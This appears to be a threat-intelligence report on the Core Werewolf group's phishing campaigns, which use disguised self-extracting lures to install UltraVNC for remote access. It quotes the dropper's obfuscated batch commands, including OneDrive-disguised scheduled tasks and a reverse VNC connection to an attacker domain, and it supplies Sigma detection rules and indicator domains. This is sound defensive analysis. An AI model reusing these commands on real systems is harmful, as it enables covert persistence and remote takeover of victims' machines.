Core Werewolf targets the defense industry and critical infrastructure
Similar to many other cybercriminals, Core Werewolf takes advantage of legitimate tools to achieve its goals. After penetrating the infrastructure with the help of phishing emails, the threat actors gain remote access by means of UltraVNC, a legitimate program, without applying any malware.
In this article, we will explore the life cycle of the detected Core Werewolf attacks, look into the tactics, techniques, and procedures employed to compromise the target systems, and describe the group’s infrastructure.
The file used in the first attack that we uncovered was uploaded to VirusTotal on August 6, 2021. Curiously enough, the malicious files were always disguised as Microsoft Word or PDF documents, even though these were executables in self-extracting archives. For example, Прил._7_критерии_оценки_...ГУВП.docx.exe (Appendix 7. Assessment criteria). Hence, the content of the documents did not raise any concern with the user. However, opening the file triggered the background installation of UltraVNC. This enabled the attackers to gain complete control over compromised devices.
The file discovered first contained an order of a defense organization (fig. 1).
Fig. 1. Excerpt of the document used by the attackers
The file detected next was posted on December 16, 2021. The phishing document included an internal order by one of the largest joint-stock companies in Russia (fig. 2).
Fig. 2. Excerpt of the document used by the attackers
It had been a while before another attack followed. The file was spotted on April 12, 2022 and contained a resume (fig. 3).
Fig. 3. Excerpt of the document used by the attackers
The file from the next attack was uploaded on April 18, 2022 and targeted the employees of some defense organizations (fig. 4).
Fig. 4. Excerpt of the document used by the attackers
Another file was posted on April 27, 2022 and was dedicated to the military discharge (fig. 5).
Fig. 5. Excerpt of the document used by the attackers
In their new attack, with the respective file uploaded on May 8, 2022, the criminals again attached an order of a defense organization (fig. 6).
Fig. 6. Excerpt of the document used by the attackers
On May 12, 2022, a new file was published on VirusTotal. This time, the attackers sent methodological recommendations of another defense organization (fig. 7).
Fig. 7. Excerpt of the document used by the attackers
The file uploaded on May 27, 2022 again contained an order (fig. 8).
Fig. 8. Excerpt of the document used by the attackers
The summer attacks started with a file posted on June 13, 2022. Disguised as a decree of the Government of the Russian Federation, the document amended the state regulation of prices for products supplied under the state defense order (fig. 9).
Fig. 9. Excerpt of the document used by the attackers
The next attack, with the file uploaded on June 28, 2022, used some guidelines to victimize the users (fig. 10).
Fig. 10. Excerpt of the document used by the attackers
July was marked by an attack that leveraged a document issued by the Department of the Federal Service for Technical and Export Control (FSTEK) of Russia for the Northwestern Federal District. It described the measures to reinforce the protection of information infrastructure facilities in Russia.
The file published on VirusTotal on July 20, 2022 contained another administrative document related to the defense sector.
The file uploaded on July 27, 2022 came as a resume, yet of a different person (fig. 11).
Fig. 11. Excerpt of the document used by the attackers
In August, the criminals once again used an order as a phishing document (fig. 12).
Fig. 12. Excerpt of the document used by the attackers
In September, the attackers went even further and, instead of some regular order, attached a document marked “For official use only.”
The October attack featured yet another decree of the Government of the Russian Federation. The document introduced amendments to the national program on the development of the nuclear power industry (fig. 13).
Fig. 13. Excerpt of the document used by the attackers
The first attack held in November (the malicious file was uploaded on November 2) used a cold supply diagram for a special-purpose high-performance computing complex.
On the following day, a new file was posted, this time containing a set of diagrams.
The next attack in November employed the group’s favored type of document, that is, related to defense industry operations (fig. 14).
Fig. 14. Excerpt of the document used by the attackers
The December attack was once again focused on the defense sector employees (fig. 15).
Fig. 15. Excerpt of the document used by the attackers
The first attack in 2023 used a request form as a phishing document (fig. 16).
Fig. 16. Excerpt of the document used by the attackers
The next attack took place in January. The phishing document provided the methodological recommendations on the exemption from active service of Russian citizens being in the military reserves of the Russian Federation and working in certain organizations, for the period of mobilization and wartime (fig. 17).
Fig. 17. Excerpt of the document used by the attackers
In February 2023, the attackers got back to sending resumes as phishing documents (fig. 18).
Fig. 18. Excerpt of the document used by the attackers
In March 2023, Core Werewolf once again attached a copy of a document meant for official use only.
On March 20, 2023, one more file was uploaded to VirusTotal with the phishing document targeting defense industry personnel.
April 2023 saw the group’s repeated attempt to use a resume for phishing purposes (fig. 19).
Fig. 19. Excerpt of the document used by the attackers
The attack that occurred in May featured yet another order (fig. 20).
Fig. 20. Excerpt of the document used by the attackers
In each of the campaigns, the devices were compromised in a similar way. Therefore, the adversary tactics, techniques, and procedures listed in the section below apply to all of the attacks.
Given that the tactics, techniques, and procedures are much the same, let us look into the compromise process drawing on the example of the attack recorded in May.
After unpacking and executing the file НУВП награждение полный.doc.exe (a list of award nominees) the following actions are performed:
- Delayed expansion of the environment variables is enabled through the following command:
setlocal enabledelayedexpansion - The environment variables are set as follows (to be further used for command obfuscation):
set sc46w96z76M16f76I86i96V16v56I76f56I06Z96V96q56O6=%COMPUTERNAME%
set ce18Z18w88q18r38o78t58x68i38P08J48m38I48y18s78S3=%RANDOM%
set Ue30z00l70K30B90i00V80E40J00K80D10w50M40t00Y30F3=nuvp
set MW17A27X27F57f77y07Q47R47j27J47g77d37a17Q77X07W8=doc
set BG15f35o55V85I95V75e65y55O85h75G55f75r45o35M55p4=Virtual
set Bo94Y44b04y64n44b34B24A04Y94e84x94h94z34q34e04b9=autore
set kM49J49K89y79Z49y39K09C99m69z29E79N49L89a39A39s6=connect
set mz70v70R90L60L20r00s90G00d80V40A20u20I90j80S00y4=443
set SF53S43Q83F33Z73M63X03N83i63i73x73F13r93p13S23v9=infovesty[.]ru
set ua60e50a30E10w90T60U60q10h70Z80C60d90x10P30Y10J3=exe - A task is created in the Windows Task Scheduler for the daily termination of the process
Virtual.exe:schtasks /create /f /tn "OneDrive Purge Task-S-1-5-21-3177791385" /tr "taskkill /f /im Virtual.exe /sc daily /st 09:02 - The timeout mode is set at 2 seconds:
timeout /t 2 - The phishing document is copied to the drive from the file opened by the victim:
copy /y "%CD%\go67x37i77J07R07W37O07G77J37T67z77l07H67z87w77M9.VH64z44L84J44O04O24a44d54X64C64q74c44R94y54y74R4" "%CD%\..\nuvp.doc" - The timeout mode is set at 4 seconds:
timeout /t 4 - The copied phishing document
start "" "%CD%\..\nuvp.doc"opens. - The executable
UltraVNCis copied from the file opened by the user to the drive namedVirtual.exe:copy /y "su22Q42Y62S62R72m92H32I82n02z12w72T72M82T82a92q9.HH75f05T55A55m95l65z65l05u15d05y85o15n45E95i25L3" "Virtual.exe" - A task is created in the Windows Task Scheduler for the daily execution of the file
Virtual.exe:schtasks /create /f /tn "OneDrive Init Task-I-2-5-22-8712003127" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe" /sc daily /st 09:03 - The process
Virtual.exeterminates:taskkill /f /im Virtual.exe - The configuration file
UltraVNCis copied to the drive:copy /y "UltraVNC.ini" "UltraVNC.ini" - The executable
Virtual.exeis started:start "" "Virtual.exe" - A task is created in the Windows Task Scheduler to start UltraVNC with the server name specified:
schtasks /create /f /tn "OneDrive Update Task-U-3-5-23-6820155392" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty\[.\]ru:443" /sc daily /st 09:04 - UltraVNC is started:
start "" "%CD%\Virtual.exe" -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty\[.\]ru:443
This way the attackers not only gain access to the compromised system after the victim opens the malicious file, but also establish persistence by scheduling the tasks. Legitimate software enables the adversaries to gain complete control over the compromised device. In particular, they can copy and exfiltrate files as well as track the user’s actions.
The attackers sought to register the domain names with several registrars, rather than one. They resorted to the services of Russian and foreign registrars, namely:
- Regtime
- REG.RU
- Ukrainian Internet Names Center
- Soaring Eagle Domains
- Realtime Register
- Wild West Domains
- OnlineNIC
- GoDaddy
The adversaries used Russian names to register the domain names, for example, Aleksandr Vladimirovich Petrishev, as well as email addresses hosted by popular Russian services—mail.ru and yandex.ru. They also used mobile telephone numbers provided by online services that enabled them to receive text messages (fig. 21).
Fig. 21. Mobile phone number used by the threat actors to register some of the domain names
It should be noted that the attackers tended to rent the servers located in Russia. This allowed them to avoid getting blacklisted and being detected early.
The Russian-Ukrainian crisis has significantly affected the global threat landscape and demonstrated the importance of implementing both defensive and offensive threat detection. Adversaries are inventing new evasion methods and tend to abandon the use of malware in favor of legitimate tools, including those embedded in the operating system. Such methods have once again proved to be effective in human-operated attacks conducted by APT groups.
Despite the attackers’ using legitimate programs, it is still possible to identify malicious activity in the course of compromise and neutralize the attack in early stages.
The intruders make ample use of the Windows Task Scheduler, including for the daily termination of the UltraVNC process employing taskkill. Note that cmd.exe. serves as a parent process to create a task. Given that such combination of actions is far from typical, it can assist in detection:
title: Taskkill Abuse via Task Scheduler
id: c0b32533-ba84-4ce9-9be6-d5e5d024bf03
status: experimental
description: Detects taskkill abuse via Task Scheduler as seen in Core Werewolf campaigns
references: https://bi.zone/eng/expertise/blog/core-werewolf-protiv-opk-i-kriticheskoy-infrastruktury
author: BI.ZONE
date: 2023/05/30
tags:
- attack.execution
- attack.t1053.005
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\cmd.exe'
Image|endswith: '\schtasks.exe'
CommandLine|Contains|All:
- 'taskkill'
- ' /f'
- ' /im '
condition: selection
fields:
- ParentImage
- Image
- CommandLine
level: medium
Likewise, the Task Scheduler is used to start UltraVNC on a daily basis. To this end, the attackers employ some specific arguments. These arguments can be detected using the following information:
title: Scheduled Task for Malicious UltraVNC
id: dd963a36-cb22-4925-8a94-fc9a9abfb65d
status: experimental
description: Detects scheduled task creation for UltraVNC as seen in Core Werewolf campaigns
references: https://bi.zone/eng/expertise/blog/core-werewolf-protiv-opk-i-kriticheskoy-infrastruktury
author: BI.ZONE
date: 2023/05/30
tags:
- attack.execution
- attack.t1053.005
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\cmd.exe'
Image|endswith: '\schtasks.exe'
CommandLine|Contains|All:
- 'autoreconnect '
- 'connect '
- 'id'
condition: selection
fields:
- ParentImage
- Image
- CommandLine
level: medium
- clodmail.ru
- seemsurprise.com
- moscowguarante.com
- linux-tech-world.net
- linux-techworld.com
- linux-tech-world.com
- getvalerianllc.com
- bitsbfree.com
- licensecheckout.net
- win32soft.com
- microsoftsupertech.com
- microsofttechinfo.com
- microsoftsupertech.com
- autotimesvc.com
- msk-gov.com
- samssmgr.com
- versusmain.com
- savebrowsing.net
- statusgeotrust.com
- contileservices.net
- tapiservicemgr.com
- microsoftdownloaderonline.com
- microsoftdownloadonline.com
- microsoftdownloader.com
- cortanaupdater.net
- cortanaupdater.com
- checkerserviceonline.net
- checkerserviceonline.com
- softsandtools.com
- sensauto.info
- softdownloaderonline.net
- softdownloaderonline.com
- uploadingonline.com
- uploadeonline.com
- uploaderonline.com
- webupdateronline.net
- webupdateronline.com
- winuptodate.com
- winupdateonline.com
- winupdateronline.com
- webengincs.com
- exactsynchtime.ru
- licensecheckout.com
- servicehost-update.net
- passportyandex.net
More indicators of compromise are available with BI.ZONE Threat Intelligence.
The number of attacks using legitimate tools against companies is constantly growing. Such attacks are not detected by preventive security tools. Hence, threat actors can gain access to the infrastructure unnoticed. In order to discover this type of intrusions, we recommend that companies implement cyber threat detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their SOC.